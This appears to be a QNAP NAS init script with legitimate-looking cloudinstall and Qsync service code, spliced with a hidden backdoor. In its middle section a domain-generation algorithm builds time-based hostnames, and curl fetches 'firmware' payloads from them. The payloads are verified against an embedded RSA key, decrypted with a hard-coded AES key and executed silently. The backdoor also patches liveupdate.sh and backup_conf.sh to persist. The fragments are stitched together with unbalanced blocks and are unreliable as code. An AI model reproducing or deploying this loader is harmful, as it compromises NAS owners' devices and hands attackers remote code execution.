|
||||
}
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
file=''
|
||||
[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
|
||||
if [ "x${file}" != 'x' ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
if [ ! -f '1550379600_c' ]; then
|
||||
touch '1550379600_c'
|
||||
test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
|
||||
cat >".backup_${file}" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
|
||||
n=0
|
||||
|
||||
for ext in $domainexts; do
|
||||
eval 'domainext'"$n"'=$ext'
|
||||
n=$(( $n + 1 ))
|
||||
done
|
||||
domainextcnt=$n
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
XEOF
|
||||
cat >>".backup_${file}" <<EOF
|
||||
test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
|
||||
cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
|
||||
EOF
|
||||
cat >>".backup_${file}" <<"XEOF"
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
curlconntimeout=12
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
|
||||
timestart=$(date +%s)
|
||||
for length in 5 3 4; do
|
||||
timenow=$(date +%s)
|
||||
test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
|
||||
curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
|
||||
test "$curlconntimeout" -lt 6 && curlconntimeout=6
|
||||
n=0; while [ "$n" -lt $domainextcnt ]; do
|
||||
eval 'ext=$domainext'"$n"
|
||||
l=$(( $length + ${ext#*:} ))
|
||||
ext=${ext%:*}
|
||||
if [ $length = 5 ]; then
|
||||
hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%${hostname#??????}}
|
||||
eval 'hostname'"$n"'=$hostname'
|
||||
fi
|
||||
eval 'host=$hostname'"$n"
|
||||
n=$(( $n + 1 ))
|
||||
trycnt=0
|
||||
while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
|
||||
trycnt=$(( $trycnt + 1 ))
|
||||
host=${host%?}
|
||||
done
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "${recentupdate:-0}" -eq 1 && exit 0
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
